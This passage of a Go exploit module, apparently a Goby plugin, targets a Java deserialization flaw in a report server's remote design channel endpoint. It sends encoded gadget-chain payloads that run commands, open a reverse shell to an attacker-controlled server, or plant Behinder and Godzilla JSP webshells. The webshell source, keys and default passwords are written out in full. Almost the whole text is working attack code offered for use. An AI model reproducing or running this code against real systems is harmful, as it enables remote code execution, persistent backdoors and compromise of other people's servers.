J4AAgCPABcA/wEAAAMAAACsAQEAkwAAAAIAqgECAKYAAQC2AAAAFgACAAgAJQD8ALcAAgB/ACcA/gC3AAIAuQAAAB8ABv8AMAACBwC+BwAsAAEHAMMA9wBCBwDDAHMHAMMAAAEBAwAAAAIBBHB0AAh3aGF0ZXZlcnB3AQB4cQB+ABJ4"

	sendPayloadad28d973 := func(u *httpclient.FixUrl, data string, cmd string) (*httpclient.HttpResponse, error) {
		var buf bytes.Buffer
		cfg := httpclient.NewPostRequestConfig("/webroot/decision/remote/design/channel")
		cfg.VerifyTls = false
		cfg.FollowRedirect = false
		cfg.Header.Store("Cmd", cmd)
		payload, err := base64.StdEncoding.DecodeString(data)
		if err != nil {
			return nil, err
		}
		gzipWriter := gzip.NewWriter(&buf)
		defer gzipWriter.Close()
		if _, err = gzipWriter.Write(payload); err != nil {
			return nil, err
		}
		if err = gzipWriter.Flush(); err != nil {
			return nil, err
		}
		cfg.Data = string(buf.Bytes())
		return httpclient.DoHttpRequest(u, cfg)
	}

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
			checkStr := goutils.RandomHexString(6)
			for _, payload := range []string{payloadHibernate1xTomcatEcho2e357e0f, payloadCB2xTomcatEchofb01aee7} {
				rsp, err := sendPayloadad28d973(u, payload, "echo "+checkStr)
				if err != nil {
					return false
				} else if strings.Contains(rsp.Utf8Html, checkStr) && !strings.Contains(rsp.Utf8Html, "echo "+checkStr) {
					return true
				}
			}
			return false
		},
		func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
			attackType := goutils.B2S(ss.Params["attackType"])
			if attackType == "cmd" {
				cmd := goutils.B2S(ss.Params["cmd"])
				for _, payload := range []string{payloadHibernate1xTomcatEcho2e357e0f, payloadCB2xTomcatEchofb01aee7} {
					rsp, err := sendPayloadad28d973(expResult.HostInfo, payload, cmd)
					if err != nil {
						expResult.Success = false
						expResult.Output = err.Error()
						return expResult
					} else if res := rsp.Utf8Html[:strings.Index(rsp.RawBody, "\x1f\x8b")]; res != "" {
						expResult.Success = true
						expResult.Output = res
						return expResult
					}
				}
			} else if attackType == "reverse" {
				waitSessionCh := make(chan string)
				rp, err := godclient.WaitSession("reverse_windows", waitSessionCh)
				if err != nil || len(rp) == 0 {
					expResult.Success = false
					expResult.Output = err.Error()
				} else {
					for _, payload := range []string{payloadHibernate1xTomcatEcho2e357e0f, payloadCB2xTomcatEchofb01aee7} {
						sendPayloadad28d973(expResult.HostInfo, payload, "#####"+godclient.GodServerAddr+":"+rp)
						select {
						case webConsoleId := <-waitSessionCh:
							if u, err := url.Parse(webConsoleId); err == nil {
								expResult.Success = true
								expResult.OutputType = "html"
								expResult.Output = `<br/> <a href="goby://sessions/view?sid=` + strings.Join(u.Query()["id"], "") + `&key=` + godclient.GetKey() + `">open shell</a>`
								return expResult
							}
						case <-time.After(time.Second * 20):
							expResult.Success = false
							expResult.Output = "漏洞利用失败"
						}
					}
				}
			} else if attackType == "webshell" {
				webshell := goutils.B2S(ss.Params["webshell"])
				content := goutils.B2S(ss.Params["content"])
				filename := goutils.RandomHexString(8) + ".jsp"
				if webshell == "behinder" {
					//该密钥为连接密码 32 位 md5 值的前 16 位，默认连接密码 rebeyond
					content = `<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>`
				} else if webshell == "godzilla" {
					// 哥斯拉 pass key
					content = `<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){} %>`
				} else {
					filename = goutils.B2S(ss.Params["filename"])
				}
				savePathMap := map[string]string{
					`../webapps/webroot/` + filename:         "/webroot/" + filename,
					`../webapps/webroot/scripts/` + filename: "/webroot/scripts/" + filename,
					`./webapps/webroot/` + filename:          "/webroot/" + filename,
					`./webapps/webroot/scripts/` + filename:  "/webroot/scripts/" + filename,
				}
				for _, payload := range []string{payloadHibernate1xTomcatEcho2e357e0f, payloadCB2xTomcatEchofb01aee7} {
					for path := range savePathMap {
						_, err := sendPayloadad28d973(expResult.HostInfo, payload, "$$$$$"+path+":"+base64.StdEncoding.EncodeToString([]byte(content)))
						if err != nil {
							expResult.Success = false
							expResult.Output = err.Error()
							return expResult
						}
						cfgCheck := httpclient.NewGetRequestConfig(savePathMap[path])
						cfgCheck.VerifyTls = false
						cfgCheck.FollowRedirect = false
						rspCheck, err := httpclient.DoHttpRequest(expResult.HostInfo, cfgCheck)
						if err != nil {
							expResult.Success = false
							expResult.Output = err.Error()
							return expResult
						} else if rspCheck.StatusCode == 200 || rspCheck.StatusCode == 500 {
							expResult.Success = true
							expResult.Output += "WebShell URL: " + expResult.HostInfo.FixedHostInfo + rspCheck.Request.URL.Path + "\n"
							if webshell == "behinder" {
								expResult.Output += "Password: rebeyond\n"
								expResult.Output += "WebShell tool: Behinder v3.0\n"
							} else if webshell == "godzilla" {
								expResult.Output += "Password: pass 加密器：JAVA_AES_BASE64\n"
								expResult.Output += "WebShell tool: Godzilla v4.1\n"
							}
							expResult.Output += "Webshell type: jsp"
							return expResult
						}
					}
				}
				expResult.Success = false
				expResult.Output = "漏洞利用失败"
			} else {
				expResult.Success = false
				expResult.Output = `未知的利用方式`
			}
			return expResult
		},
	))
}
